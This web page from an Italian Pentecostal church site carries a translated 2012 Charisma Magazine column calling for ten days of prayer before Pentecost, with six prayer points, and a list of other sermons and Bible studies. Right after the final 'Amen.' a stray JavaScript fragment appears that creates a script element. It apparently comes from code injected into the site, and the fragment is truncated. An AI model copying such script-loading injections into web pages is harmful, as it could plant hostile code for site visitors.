SIGNORE, MANDA IL VENTO DI UNA NUOVA PENTECOSTE!

Mercoledì 16 Mag, 2012 – dalla rubrica “Fire In My Bones” di  J. Lee Grady –  CHARISMA MAGAZINE.

Dodici anni fa un uomo d’affari sudafricano, Graham Power, sentì Dio spingerlo ad organizzare un incontro di preghiera nella città di Cape Town. Circa 45 mila cristiani hanno risposto alla chiamata accalcandosi in uno stadio di rugby nel marzo 2001, per intercedere per la loro nazione. Quello fu l’inizio della Giornata Mondiale di Preghiera, un evento che probabilmente coinvolgerà milioni di cristiani in 220 nazioni, la Domenica di Pentecoste, il 27 maggio.

Questo anno, gli organizzatori stanno incoraggiando le persone a estendere le loro preghiere a 10 giorni prima dell’evento, partendo dal 17 maggio. Hanno anche sollecitato i pastori ad alimentare la preghiera con sermoni sulla necessità della potenza dello Spirito Santo.

“Un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza nelle congregazioni morte. ”

E’ ovvio che lo Spirito Santo è l’orchestratore di questo movimento popolare, e spero che voi aderiate, sia partecipando ai culti locali durante i prossimi 10 giorni o focalizzando le vostre personali preghiere, sulla necessità di una nuova Pentecoste. Credo che siamo sull’orlo di una nuova stagione di risveglio spirituale, e la concentrazione della preghiera in questo mese sia la chiave per sbloccarlo.

Durante questi prossimi 10 giorni mediterò sui primi capitoli del libro degli Atti e pregherò  per un’effusione di Spirito Santo su questa nazione. Se volete unirvi a me, potete utilizzare i seguenti punti di preghiera come guida:

1. Signore, manda il vento del sincero ravvedimento.
L’effusione originale dello Spirito nel giorno di  Pentecoste, ha scatenato un’ondata di ravvedimento che ha portato 3.000 conversioni. Questo livello di convinzione, non è mai il risultato di sermoni eloquenti, messo eventi pianificati o programmi umani. Solo lo Spirito Santo può fare questo. Il miracolo più grande sulla terra si verifica quando si spezza il cuore del peccatore davanti a Dio ed egli o lei nasce di nuovo.
Signore, suscita una marea di conversioni… E come peccatori pentiti, lascia che cristiani sviati, credenti delusi e stanchi ritornino a Te.

2. Signore, manda il vento di rinnovamento spirituale.
Molte chiese sono deboli e impotenti, e alcune stanno morendo. Molte denominazioni sono paralizzate dallo spirito di religiosità. Molti pastori sono impauriti e scoraggiati. Ma un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza in congregazioni senza vita. E con il tuo vento, fa che si posi una fiamma sulla testa di ogni cristiano, particolarmente su quei riluttanti “Gedeoni”, e timidi “Timoteo” che sanno di essere chiamati, ma hanno bisogno dello Spirito che ispiri loro fiducia.

3. Signore, manda il vento di un risveglio dei giovani. Quando il vento della Pentecoste soffiò la prima volta, Pietro predicò sul profeta Gioele, dicendo: “‘Negli ultimi giorni,’ Dio dice: ‘i vostri figli e le vostre figlie profetizzeranno, e i vostri giovani avranno delle visioni'” (Atti 2:17). Questa è una promessa ancora nostra,  e che  ancora dobbiamo rivendicare. Una percentuale enorme di giovani  sono orfani, tossicodipendenti, maltrattati, sessualmente confusi o in qualche modo a rischio. Signore, fa ‘sorgere e rafforzare ministeri per raggiungere le nostre scuole e le università. Dai agli studenti il coraggio di alzarsi per Cristo e parlare per lui. Manda un altro “Jesus Movement” in questa generazione.

4. Signore, manda il vento delle manifestazioni soprannaturali. La più pietosa eresia mai partorita è l’idea che Dio ha smesso di fare miracoli dopo che è stata scritta la Bibbia. Perdonaci, Signore, per come ti limitiamo! Abbiamo bisogno della potenza della Pentecoste oggi più che mai. Quando la prima Pentecoste avvenne, le persone normali sono stati “rivestiti di potenza dall’alto” (Luca 24:49), e cominciarono a guarire gli infermi, risuscitate i morti e scacciare i demoni. Perdonaci, Signore, per essere così compiaciuti e sofisticati, al punto  abbiamo staccato la spina della tua potenza. (E perdonaci, anche per l’uso improprio, commerciando e sfruttando i doni dello Spirito Santo per un guadagno personale.) Manda un’ondata di miracoli nella chiesa. Fai che  gli stessi miracoli che si verificano in Asia, Africa e America Latina avvengano anche nella nostra nazione.

5. Signore, manda il vento di una coraggiosa evangelizzazione . Quando i primi discepoli sono stati toccati dallo Spirito Santo a Pentecoste, hanno dichiarato “le grandi cose di Dio” (Atti 2:11) ad ogni gruppo razziale ed etnico, che era in quel giorno in Gerusalemme. Abbiamo bisogno di questo coraggio anche ai nostri giorni. Molte delle nostre comunità non hanno nessun testimone del vangelo e molti cristiani non condividono la loro fede con nessuno. La vera unzione dello Spirito Santo sfocia sempre nell’evangelizzazione. Signore, alza il nostro volume! Suscita operai per toccare ogni settore della società. Manda immigrati in questa nazione che possano raggiungere i propri gruppi etnici. Che il Vangelo sia predicato in tutte le lingue parlate all’interno dei nostri confini.

6. Signore, manda il vento di un intervento divino. La nostra nazione è in una crisi disperata. Le famiglie si stanno disintegrando, la moralità si sta erodendo, la perversione è celebrata, e la nostra cultura sta diventando ostile alla fede biblica. A meno che il Signore non risponda con il suo santo fuoco dal cielo,  soccomberemo. Signore, liberaci dal male! Estendi la tua misericordia e manda un nuovo Grande Risveglio. Amen.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

DIO PARLA ANCORA

di BILLY GRAHAM  –  I diplomatici pensano che la diversità delle lingue sia il motivo basilare delle incomprensioni internazionali. Noi scopriamo però che le radici delle difficoltà internazionali sono più profonde. Nonostante che i mezzi di comunicazione siano migliori non ci siamo avvicinati maggiormente alla pace. La violazione della legge e le rivoluzioni inondano la terra. Le Nazioni Unite si riuniscono a New York e si comprendono sempre …
Leggi Tutto

Una promessa per oggi: La Mia giustizia s'innalza come le montagne più alte, i miei giudizi sono profondi come il grande oceano.

La tua giustizia s’innalza come le montagne più alte, i tuoi giudizi sono profondi come il grande oceano. O SIGNORE, tu soccorri uomini e bestie. (Salmo 36:6) –   Credo che tutta la creazione ci parla continuamente della bontà del Padre. Nella promessa di oggi, il re Davide dichiara che la giustizia di Dio si innalza come le maestose montagne della terra e i suoi giudizi sono profondi come …
Leggi Tutto

MEFIBOSHET: Riscoprire il valore del patto!

Studio biblico Scuola Domenicale Adulti –  Domenica 12 Ottobre  –  Testo biblico: 2 Samuele 4:4 – 9:1-13 Introduzione: Un patto si differenzia sostanzialmente da un contratto. Il contratto è l’accordo bilaterale tra due parti e si base sull’interesse, il patto invece è unilaterale e si basa sulla promessa. Il contratto dura per un tempo delimitato e stabilito, il patto dura per sempre. Il nostro rapporto con Dio non è stabilito …
Leggi Tutto

Promessa per oggi: Ti darò il manto della lode invece di uno spirito abbattuto.

“…per accordare gioia a quelli che fanno cordoglio in Sion, per dare loro un diadema invece della cenere, l’olio della gioia invece del lutto, il manto della lode invece di uno spirito abbattuto, affinché siano chiamati querce di giustizia, la piantagione dell’Eterno per manifestare la sua gloria.” (Isaia 61:3) Il capitolo 61 di Isaia è pieno di incredibili promesse di Dio, che sono state adempiute quando Gesù venne sulla …
Leggi Tutto

Dai nostri culti: Salvezza senza ravvedimento

Pastore Agostino Masdea  –  Domenica 23  Marzo 2014  –  (Marco 1:14-20))                                   Questo sermone confuta la dottrina della “grazia estrema” o “ipergrace”, e ribadisce che senza ravvedimento non c’è salvezza. William Booth, fondatore dell’Esercito della salvezza aveva previsto che nel XX secolo ci sarebbe stato: -Una religione senza lo Spirito Santo. -Cristiani …
Leggi Tutto

Sei Cristiano?

 di  ROBERTO BRACCO INDICE –  Introduzione –  Conoscere Cristo –  Giustificazione –  Nuova nascita –  Pace e gioia –  Speranza e fede –  Amore –  Offerte –  Vita sociale e familiare –  Testimonianza Il nostro secolo è il secolo delle imitazioni e dei surrogati. Sembra che lo sforzo scientifico sia teso alla sostituzione dell’autentico con il falso, dell’originale con la copia. Questo programma di ampio respiro include, nel …
Leggi Tutto

POSSO ESSERE CRISTIANO SENZA ANDARE IN CHIESA?

La domanda risulta simpatica riguardo al cristianesimo, ma anche suscita riserve riguardo al frequentare o meno la chiesa. Voglio immediatamente chiarire che si può essere cristiani senza andare in Chiesa, perché la conversione è una esperienza che ha luogo fra il singolo individuo e il Signore Gesù Cristo. È interessante notare nel Nuovo Testamento la varietà di luoghi nei quali le persone presero le loro decisioni di seguire Cristo …
Leggi Tutto

coro

Istruzioni su come cantare  in chiesa – dal grande predicatore del XVIII secolo John Wesley Perché questa parte del culto di adorazione sia più gradita a Dio, così come più utile ed efficace per te stesso e per gli altri, fai attenzione ad osservare le seguenti indicazioni: 1. CANTA INSIEME A TUTTI Unisciti alla congregazione più spesso che puoi. Non permettere che una leggera difficoltà o un po’ di stanchezza …
Leggi Tutto

Dai nostri Culti